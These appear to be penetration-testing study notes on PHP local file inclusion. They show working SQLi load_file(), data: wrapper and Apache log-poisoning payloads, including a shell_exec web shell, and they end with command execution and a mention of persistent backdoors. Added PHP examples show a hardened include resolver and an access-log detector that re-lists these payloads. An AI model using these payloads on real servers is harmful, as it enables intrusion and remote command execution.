LFI

Basic RCE Example:

If you have SQLi or can modify templates, see if you can read a system file. If this works you can try for RCE (in this case it's Windows with Apache):

http://192.168.11.35/comment.php?id=-1 union select all 1,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6

PHP WRAPPERS:

Example 1:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

The menu page is vulnerable to LFI. If we submit a payload using the data wrapper, the application treats the text the same as a regular file and includes it in the page:

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

EXAMPLE:

Found this code on the site:

include: used to load files (PHP files in this case) from the local server and run them. Here we can submit a value other than en, fr, etc. and have the server include other files. We test against a common Windows file to make sure our traversal works.

A null byte (%00) is appended to stop the include statement from adding the .php extension to our path.
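Added example, not code from the page or from the site it describes: the include pattern just described (a LANG parameter glued into an include() path with a .php suffix) next to a hardened version that never lets the request value touch the filesystem path. The names LANG, $langDir and the allowlist are assumptions. Two caveats worth knowing when reviewing such code: null-byte truncation of paths was removed in PHP 5.3.4, so the %00 trick only works on older builds, and the data: and php://input wrappers are only usable inside include() when allow_url_include is On (it is Off by default).

```php
<?php
declare(strict_types=1);

// Added example (not the page's code): the include pattern the page describes,
// where a LANG parameter is glued into an include() path with a .php suffix,
// beside a hardened version. LANG, $langDir and the allowlist are assumptions.

// Vulnerable: the user value becomes part of the path. "../" traversal reaches any
// readable file, and on PHP < 5.3.4 a trailing NUL (%00) dropped the ".php" suffix.
// With no suffix at all (the page's menu.php?file= case) the same defect also
// accepts stream wrappers such as data: when allow_url_include=On.
function resolveLangFileVulnerable(string $lang, string $langDir): string
{
    return $langDir . '/' . $lang . '.php';
}

// Hardened: the request value is only a key into a fixed allowlist, so no part
// of it ever reaches the filesystem; unknown keys fall back to the default.
const ALLOWED_LANGS = ['en' => 'en.php', 'fr' => 'fr.php'];

function resolveLangFileSafe(?string $lang, string $langDir): string
{
    $file = ALLOWED_LANGS[$lang] ?? ALLOWED_LANGS['en'];
    $real = realpath($langDir . '/' . $file);
    $base = realpath($langDir);
    // Defence in depth: the resolved path must still sit inside $langDir.
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file resolved outside ' . $langDir);
    }
    return $real;
}

// Constructed demo: a temporary language directory and the inputs from the page.
// Nothing is actually include()d; only the resolved paths are shown.
$langDir = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
mkdir($langDir);
file_put_contents($langDir . '/en.php', "<?php echo 'en';\n");
file_put_contents($langDir . '/fr.php', "<?php echo 'fr';\n");

$inputs = [
    'fr',
    '../../../../../../../windows/system32/drivers/etc/hosts' . "\0", // the %00 trick
    '../../../../../../../xampp/apache/logs/access.log' . "\0",       // the poisoned log
];
foreach ($inputs as $in) {
    printf("input      : %s\n", str_replace("\0", '%00', $in));
    printf("vulnerable : %s\n", str_replace("\0", '%00', resolveLangFileVulnerable($in, $langDir)));
    printf("hardened   : %s\n\n", resolveLangFileSafe($in, $langDir));
}

// Clean up the temporary directory.
unlink($langDir . '/en.php');
unlink($langDir . '/fr.php');
rmdir($langDir);
```

Run it with `php example.php`: the vulnerable resolver happily returns the traversal paths, while the hardened one resolves every unknown value to the default en.php inside $langDir. The allowlist is the real fix; the realpath() check only guards against a mistake in the list itself, and keeping allow_url_include=Off in php.ini closes the data: wrapper route on the include() side.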

Log File Poisoning RCE:

One way to get RCE with LFI is to poison a log file with PHP and then include that file through the LFI so the PHP executes. We can do this by making a malformed request with nc that contains our code, then reading the log back through the vulnerable include.

Try other PHP shells if this does not work. It may also need a pre tag to keep spacing, e.g.:

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';?>

This causes our request to get logged at: c:\xampp\apache\logs\access.log

Match your log file type/path to the server you are attacking.

Running the RCE:

http://10.11.1.35/addguestbook.php?cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00

Commands will be executed with the Apache service's privileges. From here a more persistent shell/backdoor can be established.
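Added detection example, not from the page: a scanner for Apache combined-format access log lines that flags the traces the requests in this section leave behind, for the log poisoning steps here as well as the data: wrapper and SQLi load_file() requests earlier on the page. It URL-decodes each line (repeatedly, to catch double encoding) and checks for traversal, %00, PHP tags written into the log by the raw nc request, stream wrappers, and load_file()/UNION SELECT. The log lines are constructed; the indicator names and thresholds are my own choices.

```php
<?php
declare(strict_types=1);

// Added detection example (not from the page): flag access-log lines that carry
// the request patterns the page's LFI / log-poisoning / load_file() steps leave
// behind. The log lines below are constructed in Apache combined format.

// Each indicator is a regex run against the fully URL-decoded log line.
const LFI_INDICATORS = [
    'path_traversal'  => '#\.\.[/\\\\]#',                               // ../ or ..\
    'null_byte'       => '/\x00/',                                      // %00 after decoding
    'php_tag'         => '/<\?(php|=)/i',                               // code written into the log
    'stream_wrapper'  => '/(?<![a-z])(data|php|expect|phar|file):\/{0,2}/i',
    'mysql_load_file' => '/load_file\s*\(/i',                           // the SQLi file read
    'union_select'    => '/union\s+(all\s+)?select/i',
];

// Decode repeatedly (bounded) so double-encoded payloads such as %252e%252e are seen.
function fullyDecode(string $s): string
{
    for ($i = 0; $i < 3; $i++) {
        $d = rawurldecode($s);
        if ($d === $s) {
            break;
        }
        $s = $d;
    }
    return $s;
}

// Return the names of all indicators matching one log line.
function scanAccessLogLine(string $line): array
{
    $decoded = fullyDecode($line);
    $hits = [];
    foreach (LFI_INDICATORS as $name => $re) {
        if (preg_match($re, $decoded) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Map 1-based line number => indicator names for every suspicious line.
function scanAccessLog(string $log): array
{
    $findings = [];
    foreach (explode("\n", $log) as $idx => $line) {
        if (trim($line) === '') {
            continue;
        }
        $hits = scanAccessLogLine($line);
        if ($hits !== []) {
            $findings[$idx + 1] = $hits;
        }
    }
    return $findings;
}

// Constructed sample: a benign request, the data: wrapper request, the raw nc
// request that writes PHP into the log (note the 404: no such path exists), the
// include of the poisoned log with %00, and the SQLi load_file() read.
$sampleLog = <<<'LOG'
10.11.0.99 - - [12/Mar/2024:10:15:01 +0000] "GET /menu.php?file=en HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.11.0.99 - - [12/Mar/2024:10:15:07 +0000] "GET /menu.php?file=data:text/plain,%3C%3Fphp%20echo%20shell_exec(%22dir%22)%20%3F%3E HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.11.0.99 - - [12/Mar/2024:10:15:12 +0000] "GET /<?php echo shell_exec($_GET['cmd']); ?> HTTP/1.1" 404 209 "-" "-"
10.11.0.99 - - [12/Mar/2024:10:15:20 +0000] "GET /addguestbook.php?cmd=ipconfig&LANG=../../../../../../../xampp/apache/logs/access.log%00 HTTP/1.1" 200 5531 "-" "Mozilla/5.0"
10.11.0.99 - - [12/Mar/2024:10:16:02 +0000] "GET /comment.php?id=-1%20union%20select%20all%201,2,3,4,load_file('c:/windows/system32/drivers/etc/hosts'),6 HTTP/1.1" 200 1100 "-" "Mozilla/5.0"
LOG;

foreach (scanAccessLog($sampleLog) as $lineNo => $hits) {
    printf("line %d: %s\n", $lineNo, implode(', ', $hits));
}
```

Against the constructed sample this reports line 2 (php_tag, stream_wrapper), line 3 (php_tag), line 4 (path_traversal, null_byte) and line 5 (mysql_load_file, union_select); the benign line 1 is silent. The pair of line 3 followed by line 4 is the log poisoning signature: a PHP tag in a request path that 404s, then a later request whose include parameter points at the log file. Point the same function at a real access.log with a 404 filter on the php_tag hit to cut noise from scanners that merely probe for PHP.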
